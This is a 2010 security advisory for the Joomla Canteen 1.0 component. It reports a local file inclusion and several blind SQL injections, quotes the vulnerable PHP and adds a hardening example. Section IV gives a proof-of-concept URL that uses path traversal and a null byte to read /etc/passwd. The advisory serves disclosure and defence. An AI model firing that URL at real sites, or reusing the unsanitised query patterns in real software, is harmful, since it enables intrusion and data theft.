Joomla Canteen 1.0 SQL Injection / Local File Inclusion

Date: 06 Jul 2010
Reported by: Salvatore Fresta
Type: packetstorm
Source: packetstormsecurity.com

Canteen Joomla Component 1.0 vulnerability: SQL Injection & Local File Inclusion

Canteen Joomla Component 1.0 Multiple Remote Vulnerabilities
  
Name Canteen  
Vendor http://www.miniwork.eu  
Versions Affected 1.0  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-04-07  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
  
Canteen is a Joomla 1.5 component.  
This component is written for canteens. You can easily   
manage daily menu with this component.  
  
  
II. DESCRIPTION  
  
Some parameters are not sanitised before being used in
SQL queries and in dangerous PHP functions.
  
  
III. ANALYSIS  
  
Summary:  
  
A) Local File Inclusion  
B) Multiple Blind SQL Injection  
  
  
A) Local File Inclusion  
  
The controller parameter in canteen.php is not sanitised
before being used in the PHP function require_once().
This allows a guest to include local files. The following
is the affected code:

```php
if($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
```
  
  
B) Multiple Blind SQL Injection  
  
The mealid parameter in menu.php is not properly sanitised
before being used in multiple SQL queries. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code. The following is the affected code:
  
```php
$mealid = JRequest::getVar('mealid');
$SQLQuery = "INSERT INTO #__miniwork_canteen_order (jo_userid, jo_mealid, jo_created, jo_createdby, jo_changed, jo_changedby)
VALUES (".$user->id.", ".$mealid.", NOW(), '".$user->sSecondName." ".$user->sFirstName."', NOW(), '".$user->sSecondName." ".$user->sFirstName."')";
```

```php
$mealid = JRequest::getVar('mealid');
$SQLQuery = "DELETE FROM #__miniwork_canteen_order WHERE jo_mealid = ".$mealid." AND jo_userid = ".$orduser->id.";";
```

```php
$mealid = JRequest::getVar('mealid');
$SQLQuery = "UPDATE #__miniwork_canteen_order SET jo_userid = ".$orduser->id.", jo_changed=NOW(), jo_changedby='".$orduser->sSecondName." ".$orduser->sFirstName."' WHERE jo_mealid=".$mealid." AND jo_userid is null LIMIT 1;";
```
  
  
IV. SAMPLE CODE  
  
A) Local File Inclusion  
  
http://site/path/index.php?option=com_canteen&controller=../../../../../etc/passwd%00  
  
  
V. FIX  
  
Check for path traversal sequences and use PHP's
intval() for integer values.
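The fix above, written out as an added hardening example against the affected snippets. This is not the component's or the advisory author's code; it assumes the Joomla 1.5 APIs JRequest::getCmd()/getInt(), JFactory::getDBO(), JDatabase::Quote() and JError::raiseError(), and the controller names 'menu' and 'order' are placeholders for the component's real controller files.

```php
<?php
// Added hardening example (not the Canteen component's own code).
// Assumes Joomla 1.5: JRequest, JFactory, JError, JPATH_COMPONENT, DS,
// and that $orduser is the user object already used by menu.php.

// A) Controller loading. Reduce the value to a command-style token and then
//    require it to match an explicit allow-list, so neither "../" sequences
//    nor a trailing null byte can reach require_once().
$allowedControllers = array('menu', 'order'); // assumption: the component's controllers
$controller = JRequest::getCmd('controller', 'menu'); // keeps only [A-Za-z0-9_.-]
if (!in_array($controller, $allowedControllers, true)) {
    JError::raiseError(404, 'Unknown controller');
}
require_once JPATH_COMPONENT . DS . 'controllers' . DS . $controller . '.php';

// B) mealid and the user id are only compared with integer columns, so cast
//    them before concatenation (the intval() fix the advisory proposes).
//    The name is a string, so it goes through the driver's Quote(), which
//    escapes and quotes it, instead of being pasted between literal quotes.
$mealid = JRequest::getInt('mealid', 0);
if ($mealid <= 0) {
    JError::raiseError(400, 'Invalid mealid');
}
$db        = JFactory::getDBO();
$changedBy = $db->Quote($orduser->sSecondName . ' ' . $orduser->sFirstName);
$query = 'UPDATE #__miniwork_canteen_order'
    . ' SET jo_userid = ' . (int) $orduser->id
    . ', jo_changed = NOW(), jo_changedby = ' . $changedBy
    . ' WHERE jo_mealid = ' . (int) $mealid
    . ' AND jo_userid IS NULL LIMIT 1';
$db->setQuery($query);
$db->query();
```

The same integer cast applies to the INSERT and DELETE statements shown in section III, since jo_mealid and jo_userid are the only attacker-influenced values in them.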
  
